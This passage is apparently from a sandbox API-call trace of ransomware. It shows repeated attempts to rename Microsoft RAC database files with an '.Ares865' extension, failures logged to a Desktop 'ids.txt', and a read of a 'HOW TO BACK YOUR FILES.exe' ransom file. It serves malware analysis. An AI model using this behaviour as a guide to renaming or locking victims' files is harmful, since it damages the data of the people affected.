Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 129 [0045.346] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 129 [0045.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.346] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x652 [0045.346] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x81, lpOverlapped=0x0) returned 1 [0045.347] CloseHandle (hObject=0x164) returned 1 [0045.347] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.347] CloseHandle (hObject=0x0) returned 0 [0045.347] CloseHandle (hObject=0x0) returned 0 [0045.347] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.347] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.347] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2488 [0045.386] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 117 [0045.386] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.386] GetLastError () returned 0x20 [0045.386] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 139 [0045.386] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 139 [0045.386] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.386] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6d3 [0045.387] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x8b, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x8b, lpOverlapped=0x0) returned 1 [0045.387] CloseHandle (hObject=0x164) returned 1 [0045.448] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.448] CloseHandle (hObject=0x0) returned 0 [0045.448] CloseHandle (hObject=0x0) returned 0 [0045.448] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.449] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 124 [0045.449] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.449] GetLastError () returned 0x20 [0045.449] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 146 [0045.449] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 146 [0045.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.449] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x75e [0045.449] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x92, lpOverlapped=0x0) returned 1 [0045.449] CloseHandle (hObject=0x164) returned 1 [0045.450] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.450] CloseHandle (hObject=0x0) returned 0 [0045.450] CloseHandle (hObject=0x0) returned 0 [0045.450] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.450] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.450] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24c8 [0045.497] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0045.497] GetLastError () returned 0x0 [0045.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x318fb0 [0045.497] ReadFile (in: hFile=0x120, lpBuffer=0x318fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x318fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0045.498] CloseHandle (hObject=0x120) returned 1 [0045.498] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c231540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.516] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 134 [0045.516] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.516] GetLastError () returned 0x20 [0045.516] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 156 [0045.516] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 156 [0045.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.516] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7f0 [0045.516] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x9c, lpOverlapped=0x0) returned 1 [0045.517] CloseHandle (hObject=0x164) returned 1 [0045.518] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.518] CloseHandle (hObject=0x0) returned 0 [0045.518] CloseHandle (hObject=0x0) returned 0 [0045.518] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.519] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 141 [0045.519] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.519] GetLastError () returned 0x20 [0045.519] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 163 [0045.519] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 163 [0045.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.519] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x88c [0045.519] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xa3, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xa3, lpOverlapped=0x0) returned 1 [0045.519] CloseHandle (hObject=0x164) returned 1 [0045.520] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.520] CloseHandle (hObject=0x0) returned 0 [0045.520] CloseHandle (hObject=0x0) returned 0 [0045.520] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.520] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.520] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24e8 [0045.568] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 151 [0045.568] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.568] GetLastError () returned 0x20 [0045.568] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 173 [0045.568] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 173 [0045.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.568] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x92f [0045.568] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xad, lpOverlapped=0x0) returned 1 [0045.568] CloseHandle (hObject=0x164) returned 1 [0045.571] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.572] CloseHandle (hObject=0x0) returned 0 [0045.572] CloseHandle (hObject=0x0) returned 0 [0045.572] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.572] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 158 [0045.572] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.572] GetLastError () returned 0x20 [0045.572] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 180 [0045.572] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 180 [0045.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.572] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9dc [0045.573] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xb4, lpOverlapped=0x0) returned 1 [0045.573] CloseHandle (hObject=0x164) returned 1 [0045.573] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.573] CloseHandle (hObject=0x0) returned 0 [0045.573] CloseHandle (hObject=0x0) returned 0 [0045.574] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.574] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.574] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2508 [0045.620] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 168 [0045.620] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.620] GetLastError () returned 0x20 [0045.620] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 190 [0045.620] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 190 [0045.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.620] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa90 [0045.620] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xbe, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xbe, lpOverlapped=0x0) returned 1 [0045.621] CloseHandle (hObject=0x164) returned 1 [0045.621] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.622] CloseHandle (hObject=0x0) returned 0 [0045.622] CloseHandle (hObject=0x0) returned 0 [0045.622] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.622] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 175 [0045.622] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.622] GetLastError () returned 0x20 [0045.622] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 197 [0045.622] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 197 [0045.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.622] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb4e [0045.623] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0xc5, lpOverlapped=0x0) returned 1 [0045.623] CloseHandle (hObject=0x164) returned 1 [0045.623] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.623] CloseHandle (hObject=0x0) returned 0 [0045.623] CloseHandle 